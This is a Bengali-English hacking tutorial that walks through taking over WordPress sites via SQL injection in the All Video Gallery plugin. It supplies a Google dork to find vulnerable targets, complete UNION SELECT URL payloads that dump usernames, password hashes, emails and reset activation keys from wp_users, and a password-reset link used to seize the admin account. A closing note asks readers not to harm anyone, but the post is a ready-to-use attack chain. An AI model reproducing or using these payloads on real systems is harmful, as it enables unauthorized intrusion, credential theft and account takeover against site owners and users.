Hack WordPress Websites using SQL injection

 চলুন দেখি কি করে ওয়ার্ডপ্রেস ওয়েবসাইট এ SQLi Injection করতে হয় ।

1st step:–First we will find a Target using a Google dork 

inurl:all-video-gallery/config.php?vid=

2nd step:– Open any website

3rd step:– now lets do a sql injection..flowing the exploit code & photo
Exploit Code for finding usename &password :




সাইট এর URL এর শেষে নিচের URL টি রিপ্লেস করে দিন…

1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users--

যেমন :

http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users–

You can also try this……Exploit Code for finding usename &email:
সাইট এর URL এর শেষে নিচের URL টি রিপ্লেস করে দিন…
1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users-
যেমন :
: http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users-

4th step:–  Go to Site admin panel

 http://site.com/wp-admin  OR http:s//site.com/wp-login.php
“Then click on Lost Password”



5th step:- Enter the Email & then click nwe password


6th step:-Now finding  activation code
সাইট এর URL এর শেষে নিচের URL টি রিপ্লেস করে দিন..
1+union+select+1,2,3,4,group_concat(user_login,user_activation_key,0x3b),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users–
যেমন:-
http://site.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,user_activation_key,0x3b),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users–


7th step:- Go password reset option..follow this link
http://site.com/wp-login.php?
action=rp&key=resetkey&login=username


নতুন password দিয়ে এন্টার দিন তাহলে password change হয়ে যাবে ।

final step:- now open ur site admin panel..follow this link
http://site.com/wp-admin  OR http:s//site.com/wp-login.php


বিঃদ্রিঃ -
(১) বাংলা লিখতে আমার একটু প্রব্লেম হয় । বেশি First লিকতে পারি না ।তাই এই পোস্ট টি english এ দিলাম ।
(২)  কারো ক্ষতি করার জন্য আমার এই পোস্ট কাজে লাগাবেন না।
(৩) যদি কোন প্রব্লেম হয় তাহলে আমার কাসে Ask করবেন